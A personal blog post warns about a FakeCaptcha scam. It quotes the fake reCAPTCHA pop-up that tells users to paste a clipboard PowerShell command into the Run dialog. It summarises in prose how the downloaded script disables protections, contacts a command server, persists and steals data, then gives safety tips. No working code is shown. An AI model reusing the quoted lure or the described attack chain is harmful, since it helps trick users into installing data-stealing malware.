A Weekend Encounter with a FakeCaptcha Attack
This weekend, I randomly chanced upon a website trying to attempt a FakeCaptcha attack. Upon clicking the link, I was prompted with a CAPTCHA verification—seemingly normal, right? But after clicking the “I am not a robot” checkbox, a pop-up appeared with an unusual message:
“Could not connect to the reCAPTCHA. To better prove you are not a robot, please: 1. Press & hold the Windows key + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish.”
Something felt off and rightly so. Upon closer inspection, I realised that clicking the checkbox had copied a PowerShell command to my clipboard:
How FakeCaptcha tries to Infect your system
The moment I clicked the checkbox, the website had secretly copied a PowerShell command to my clipboard. The command was designed to download and execute a malicious JavaScript file using PowerShell. The intent was to infect the system silently, without flashing any alert windows on screen.
What does this malicious script do?
Upon further investigation, I realised that the system_t.js script was designed to execute the following:
Bypass Security Restrictions – It modifies the execution policy thereby allowing malicious scripts to run without security prompts.
Download Additional Malware – It constructs URLs to fetch more JavaScript code and a ZIP file containing harmful payloads.
Communicate with a Command & Control (C2) Server – The script sends a request to a remote server likely for tracking or further instructions.
Disable Windows Defender – If running with administrator privileges, it adds Windows Defender exclusions to avoid detection.
Extract and Execute the Payload – The ZIP file is extracted, and its contents are executed via wscript.exe, potentially triggering ransomware or spyware.
Ensure Persistence – It modifies the Windows Registry to launch itself at startup, making it difficult to remove.
Delete Evidence – The script erases the ZIP file post-execution to cover its tracks.
What malware is typically used in these attacks?
According to Avast, FakeCaptcha scams often deploy Lumma Stealer—a sophisticated malware designed to steal:
✅ Passwords
✅ Financial data
✅ Personal information
Why is FakeCaptcha dangerous?
CAPTCHAs are everywhere and we generally trust them. But cybercriminals are now making use of this trust by using FakeCaptcha scams to manipulate users into running harmful scripts.
Interestingly, only 3 out of 61 security vendors on VirusTotal were able to detect this malicious script—highlighting how advanced and surreptitious these attacks have become.
Avast security experts also observed a significant rise in FakeCaptcha campaigns in Q3 2024, with the attackers increasingly depending on such deceptive tactics to distribute malware.
Protecting from FakeCaptcha scams.
The good news is that it is easy to be safe with a few simple precautions:
✔ Question the Unusual – If a CAPTCHA appears on a website that normally wouldn’t have one, or it asks you to run commands or scripts, stop immediately.
✔ Never follow manual Instructions – Legitimate CAPTCHAs will never ask you to copy and paste commands into your system. If they do, it’s a major red flag.
✔ Use Updated Security Software – A good antivirus program can detect and block malicious scripts before they infect your device.
✔ Stay Informed – Understanding how these scams work helps to recognize red flags before falling victim.
Being Cyber-Aware is the key!
FakeCaptcha attacks are a serious cybersecurity threat and awareness is our best defence. Cybercriminals are getting more and more sophisticated, using social engineering tactics to trick naive users. By staying vigilant and following best security practices, we can stay protected from falling victim to these scams.
With cybercriminals evolving their tactics, cybersecurity awareness is more important than ever. Next time you see a CAPTCHA request, think twice before clicking. It just might not be what it seems.